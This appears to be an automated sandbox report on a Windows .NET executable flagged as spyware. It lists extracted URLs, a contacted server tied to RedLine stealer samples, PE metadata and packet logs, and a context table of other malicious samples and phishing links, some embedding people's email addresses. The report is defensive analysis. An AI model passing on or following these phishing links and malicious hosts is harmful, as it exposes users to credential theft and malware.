https://duckduckgo.com/chrome_newtabfile.exe, 00000003.00000002.589808374.00000000097A7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000002.598664454.000000000A54D000.00000004.00000020.00020000.00000000.sdmpfalse
    		high
    http://www.fontbureau.com/designersGfile.exe, 00000000.00000002.561781537.0000000006A82000.00000004.00000800.00020000.00000000.sdmpfalse
      		high
      http://www.monotype.Tfile.exe, 00000000.00000003.546481873.00000000059A4000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      		unknown
      https://duckduckgo.com/ac/?q=file.exe, 00000003.00000002.598664454.000000000A54D000.00000004.00000020.00020000.00000000.sdmpfalse
        		high
        http://www.fontbureau.com/designers/?file.exe, 00000000.00000002.561781537.0000000006A82000.00000004.00000800.00020000.00000000.sdmpfalse
          		high
          http://www.founder.com.cn/cn/bThefile.exe, 00000000.00000002.561781537.0000000006A82000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          http://www.fontbureau.com/designers?file.exe, 00000000.00000002.561781537.0000000006A82000.00000004.00000800.00020000.00000000.sdmpfalse
            		high
            http://www.jiyu-kobo.co.jp/jp/Hfile.exe, 00000000.00000003.541824255.0000000005977000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://search.yahoo.com?fr=crmas_sfpffile.exe, 00000003.00000002.589808374.00000000097A7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000002.598664454.000000000A54D000.00000004.00000020.00020000.00000000.sdmpfalse
              		high
              http://www.tiro.comfile.exe, 00000000.00000002.561781537.0000000006A82000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              http://www.fontbureau.com/designersfile.exe, 00000000.00000002.561781537.0000000006A82000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                http://www.goodfont.co.krfile.exe, 00000000.00000002.561781537.0000000006A82000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://www.carterandcone.comfile.exe, 00000000.00000003.541494170.0000000005973000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://www.fontbureau.comceTFfile.exe, 00000000.00000003.550366748.0000000005973000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://www.jiyu-kobo.co.jp/-czfile.exe, 00000000.00000003.541870112.0000000005977000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.541824255.0000000005977000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://www.jiyu-kobo.co.jp/~file.exe, 00000000.00000003.541870112.0000000005977000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.541824255.0000000005977000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://www.sajatypeworks.comfile.exe, 00000000.00000002.561781537.0000000006A82000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://www.typography.netDfile.exe, 00000000.00000002.561781537.0000000006A82000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://www.founder.com.cn/cn/cThefile.exe, 00000000.00000002.561781537.0000000006A82000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://www.galapagosdesign.com/staff/dennis.htmfile.exe, 00000000.00000002.561781537.0000000006A82000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://fontfabrik.comfile.exe, 00000000.00000002.561781537.0000000006A82000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://www.jiyu-kobo.co.jp/t-ifile.exe, 00000000.00000003.541870112.0000000005977000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.541824255.0000000005977000.00000004.00000020.00020000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                http://www.carterandcone.comMicfile.exe, 00000000.00000003.541494170.0000000005973000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://www.galapagosdesign.com/DPleasefile.exe, 00000000.00000002.561781537.0000000006A82000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://www.fonts.comfile.exe, 00000000.00000002.561781537.0000000006A82000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  http://www.sandoll.co.krfile.exe, 00000000.00000002.561781537.0000000006A82000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  		unknown
                  http://www.jiyu-kobo.co.jp/jp/Sfile.exe, 00000000.00000003.541870112.0000000005977000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.541824255.0000000005977000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://www.urwpp.deDPleasefile.exe, 00000000.00000002.561781537.0000000006A82000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  		unknown
                  http://www.zhongyicts.com.cnfile.exe, 00000000.00000002.561781537.0000000006A82000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://www.sakkal.comfile.exe, 00000000.00000002.561781537.0000000006A82000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://www.apache.org/licenses/LICENSE-2.0file.exe, 00000000.00000002.561781537.0000000006A82000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    http://www.fontbureau.comfile.exe, 00000000.00000002.561781537.0000000006A82000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      https://www.google.com/images/branding/product/ico/googleg_lodp.icofile.exe, 00000003.00000002.589808374.00000000097A7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000002.598664454.000000000A54D000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=file.exe, 00000003.00000002.598664454.000000000A54D000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          https://search.yahoo.com/favicon.icohttps://search.yahoo.com/searchfile.exe, 00000003.00000002.589808374.00000000097A7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000002.598664454.000000000A54D000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            http://www.jiyu-kobo.co.jp/jp/file.exe, 00000000.00000003.541870112.0000000005977000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.541824255.0000000005977000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://en.wikipfile.exe, 00000000.00000003.540784331.000000000597E000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.jiyu-kobo.co.jp/?file.exe, 00000000.00000003.541824255.0000000005977000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=file.exe, 00000003.00000002.589808374.00000000097A7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000002.598664454.000000000A54D000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              http://www.jiyu-kobo.co.jp/Suefile.exe, 00000000.00000003.541824255.0000000005977000.00000004.00000020.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.carterandcone.comlfile.exe, 00000000.00000002.561781537.0000000006A82000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.founder.com.cn/cn/file.exe, 00000000.00000003.541188088.000000000597C000.00000004.00000020.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://ac.ecosia.org/autocomplete?q=file.exe, 00000003.00000002.598664454.000000000A54D000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                https://search.yahoo.com?fr=crmas_sfpfile.exe, 00000003.00000002.589808374.00000000097A7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000002.598664454.000000000A54D000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  http://www.fontbureau.com/designers/cabarga.htmlNfile.exe, 00000000.00000002.561781537.0000000006A82000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://www.founder.com.cn/cnfile.exe, 00000000.00000003.541122156.000000000597C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.541188088.000000000597C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.561781537.0000000006A82000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.fontbureau.com/designers/frere-user.htmlfile.exe, 00000000.00000002.561781537.0000000006A82000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://www.fontbureau.comoitufile.exe, 00000000.00000003.555478821.0000000005970000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.550366748.0000000005973000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.561708269.0000000005978000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.jiyu-kobo.co.jp/jp/&file.exe, 00000000.00000003.541870112.0000000005977000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.541824255.0000000005977000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.jiyu-kobo.co.jp/rfile.exe, 00000000.00000003.541870112.0000000005977000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.541824255.0000000005977000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.jiyu-kobo.co.jp/Y0-ffile.exe, 00000000.00000003.541870112.0000000005977000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.541824255.0000000005977000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • 0%, Virustotal, Browse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.jiyu-kobo.co.jp/file.exe, 00000000.00000003.541824255.0000000005977000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.561781537.0000000006A82000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.fontbureau.comofile.exe, 00000000.00000003.555478821.0000000005970000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.550366748.0000000005973000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.jiyu-kobo.co.jp/lfile.exe, 00000000.00000003.541870112.0000000005977000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.541824255.0000000005977000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.fontbureau.com/designers8file.exe, 00000000.00000002.561781537.0000000006A82000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://www.carterandcone.comsiofile.exe, 00000000.00000003.541494170.0000000005973000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=file.exe, 00000003.00000002.598664454.000000000A54D000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          http://www.jiyu-kobo.co.jp/WebdAfile.exe, 00000000.00000003.541870112.0000000005977000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.541824255.0000000005977000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown

                                          World Map of Contacted IPs

                                          • No. of IPs < 25%
                                          • 25% < No. of IPs < 50%
                                          • 50% < No. of IPs < 75%
                                          • 75% < No. of IPs

                                          Public IPs

                                          IPDomainCountryFlagASNASN NameMalicious
                                          89.238.170.240
                                          		unknownUnited Kingdom
                                          		9009M247GBfalse

                                          General Information

                                          Joe Sandbox Version:37.1.0 Beryl
                                          Analysis ID:895395
                                          Start date and time:2023-06-28 01:58:05 +02:00
                                          Joe Sandbox Product:CloudBasic
                                          Overall analysis duration:0h 8m 54s
                                          Hypervisor based Inspection enabled:false
                                          Report type:full
                                          Cookbook file name:default.jbs
                                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                          Number of analysed new started processes analysed:4
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:0
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • HDC enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Sample file name:file.exe
                                          Detection:MAL
                                          Classification:mal72.spyw.evad.winEXE@3/1@0/1
                                          EGA Information:
                                          • Successful, ratio: 100%
                                          HDC Information:
                                          • Successful, ratio: 91.9% (good quality ratio 90.4%)
                                          • Quality average: 91.5%
                                          • Quality standard deviation: 18.6%
                                          HCA Information:
                                          • Successful, ratio: 100%
                                          • Number of executed functions: 38
                                          • Number of non-executed functions: 11
                                          Cookbook Comments:
                                          • Found application associated with file extension: .exe
                                          • Override analysis time to 240s for sample files taking high CPU consumption

                                          Warnings

                                          • Exclude process from analysis (whitelisted): audiodg.exe, WMIADAP.exe
                                          • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                          • Report size getting too big, too many NtOpenFile calls found.
                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                          • Report size getting too big, too many NtQueryAttributesFile calls found.

                                          Simulations

                                          Behavior and APIs

                                          TimeTypeDescription
                                          01:59:05API Interceptor1x Sleep call for process: file.exe modified

                                          Joe Sandbox View / Context

                                          IPs

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          89.238.170.240file.exeGet hashmaliciousRedLineBrowse
                                            file.exeGet hashmaliciousRedLineBrowse
                                              file.exeGet hashmaliciousDarkTortillaBrowse

                                                Domains

                                                No context

                                                ASNs

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                M247GBeft02766324.htmGet hashmaliciousHTMLPhisherBrowse
                                                • 172.86.68.78
                                                https://e.targito.com/c?a=a765e20b-92d0-4544-a4c3-c23518cbf01d&o=gsklub_cz&m=6b67e0df-8f21-4d26-bac6-98abbf8b9329&c=75283f30-ec7c-4c64-8e96-b11b9ceb9007&d=1550125868&l=footer_menu_2&u=http://jtq.hummingbird-hemp.sa.com/jumeirah/YWJyYWhhbS5jaGFja29AanVtZWlyYWguY29tGet hashmaliciousHTMLPhisherBrowse
                                                • 172.111.230.78
                                                ORDER_PDF.scr.exeGet hashmaliciousAveMariaBrowse
                                                • 91.207.102.163
                                                file.exeGet hashmaliciousRedLineBrowse
                                                • 89.238.170.240
                                                file.exeGet hashmaliciousRedLineBrowse
                                                • 89.238.170.240
                                                ym9Q7TKfdl.elfGet hashmaliciousMiraiBrowse
                                                • 5.253.204.82
                                                https://view.monday.com/4691743240-93f0d1387675ad51e7ad30e1d370f7c2?r=use1Get hashmaliciousHTMLPhisherBrowse
                                                • 193.29.104.34
                                                https://view.monday.com/1215796002-fa49e32916f403117361f25068bb796b?r=euc1Get hashmaliciousHTMLPhisherBrowse
                                                • 38.132.122.142
                                                _Outlook_Sec.msiGet hashmaliciousUnknownBrowse
                                                • 37.120.222.88
                                                LkrzzStoiD.elfGet hashmaliciousMiraiBrowse
                                                • 196.16.207.202
                                                T4148lxE0N.exeGet hashmaliciousAveMaria, PrivateLoader, UACMeBrowse
                                                • 45.61.128.246
                                                https://www.dropbox.com/scl/fi/m9a263bb5nbicr9ldfrga/Please-the-vital-document-below.paper?dl=0&rlkey=wdjfbq8jvet7ijur79vtm40o5Get hashmaliciousHTMLPhisherBrowse
                                                • 38.132.122.142
                                                OriginalMessage.txt.msgGet hashmaliciousHTMLPhisherBrowse
                                                • 185.156.172.41
                                                https://tracking.solutiondynamics.com/?ApplicationId=SASES;cid=WRC&eid=65836714&jid=71771&event=clicked&ref=UpdateDetails&ref2=21258/434/00D&dest=http://SVHUo.womansgiftshop.sa.com/neil.simpson@walbrookasset.comGet hashmaliciousUnknownBrowse
                                                • 172.111.230.78
                                                https://tracking.solutiondynamics.com/?ApplicationId=SASES;cid=WRC&eid=65836714&jid=71771&event=clicked&ref=UpdateDetails&ref2=83639/434/00D&dest=http://rGGZn.womansgiftshop.sa.com/j.ruiztarre@eif.orgGet hashmaliciousUnknownBrowse
                                                • 172.111.230.78
                                                SII_Sec.msiGet hashmaliciousUnknownBrowse
                                                • 37.120.222.88
                                                Hceea.exeGet hashmaliciousUnknownBrowse
                                                • 93.177.75.77
                                                HUAHE_Updated_CATALOGUE_PDF.com.exeGet hashmaliciousAveMaria, GuLoader, PrivateLoader, UACMeBrowse
                                                • 37.120.210.219
                                                ORDER_PDF.scr.exeGet hashmaliciousAveMariaBrowse
                                                • 91.207.102.163
                                                PIvOX24YIO.elfGet hashmaliciousMiraiBrowse
                                                • 38.202.250.24

                                                JA3 Fingerprints

                                                No context

                                                Dropped Files

                                                No context

                                                Created / dropped Files

                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\file.exe.log

                                                Download File
                                                Process:C:\Users\user\Desktop\file.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):1216
                                                Entropy (8bit):5.355304211458859
                                                Encrypted:false
                                                SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                                                MD5:FED34146BF2F2FA59DCF8702FCC8232E
                                                SHA1:B03BFEA175989D989850CF06FE5E7BBF56EAA00A
                                                SHA-256:123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                                                SHA-512:1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                                                Malicious:true
                                                Reputation:high, very likely benign file
                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

                                                Static File Info

                                                General

                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Entropy (8bit):7.471508522555688
                                                TrID:
                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                • Win32 Executable (generic) a (10002005/4) 49.78%
                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                • DOS Executable Generic (2002/1) 0.01%
                                                File name:file.exe
                                                File size:535'040 bytes
                                                MD5:ccbba2aac1cae3a0bd29cb42203e20b4
                                                SHA1:fc43185094768f22e4857f09cf902e4ab8b1ce57
                                                SHA256:3cd8941da73295f75980a8c38d92902b378614aabddfb395121cbc1724abce22
                                                SHA512:ecd37df1d15a76a90354021a28194d44948133de5e712a09666fdf85bc175e611dca27a660833fc7f865a1eaa942b703a1e25d3a0b2d8a9f75f86b7e6b5e3a56
                                                SSDEEP:6144:lRdos3JPCNdsRxUxQ/tYqKFBXf1iJi3m916neS8mJOWzTKHUGetd/3U2m24:Nos5m68QlYqKdyisScKWNckzh
                                                TLSH:FBB4473C1CBD2A3BC035D6B98FD5C463F554843F3922A936A8D787A44746EA225C323E
                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0.............>=... ...@....@.. ....................................@................................

                                                File Icon

                                                Icon Hash:90cececece8e8eb0

                                                Static PE Info

                                                General

                                                Entrypoint:0x483d3e
                                                Entrypoint Section:.text
                                                Digitally signed:false
                                                Imagebase:0x400000
                                                Subsystem:windows gui
                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                Time Stamp:0xA1B089DF [Sat Dec 18 00:10:07 2055 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:
                                                OS Version Major:4
                                                OS Version Minor:0
                                                File Version Major:4
                                                File Version Minor:0
                                                Subsystem Version Major:4
                                                Subsystem Version Minor:0
                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                Entrypoint Preview

                                                Instruction
                                                jmp dword ptr [00402000h]
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al

                                                Data Directories

                                                NameVirtual AddressVirtual Size Is in Section
                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x83ce90x4f.text
                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x840000x630.rsrc
                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x860000xc.reloc
                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x827c00x70.text
                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                Sections

                                                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                .text0x20000x81d440x81e00False0.8235044213185756data7.48667005978947IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                .rsrc0x840000x6300x800False0.33837890625data3.475912431944506IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .reloc0x860000xc0x200False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                Resources

                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                RT_VERSION0x840900x3a0data0.4191810344827586
                                                RT_MANIFEST0x844400x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                Imports

                                                DLLImport
                                                mscoree.dll_CorExeMain

                                                Network Behavior

                                                Network Port Distribution

                                                TCP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Jun 28, 2023 01:59:22.806407928 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:22.844960928 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:22.845141888 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:22.845212936 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:22.845773935 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:22.882499933 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:22.882585049 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:22.882893085 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:22.882939100 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:22.882982969 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:22.882987022 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:22.883016109 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:22.883049011 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:22.883049011 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:22.883100986 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:22.919987917 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:22.920042992 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:22.920083046 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:22.920128107 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:22.920128107 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:22.920129061 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:22.920172930 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:22.920201063 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:22.920201063 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:22.920211077 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:22.920252085 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:22.920255899 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:22.920314074 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:22.920334101 CEST22274969289.238.170.240192.168.2.4
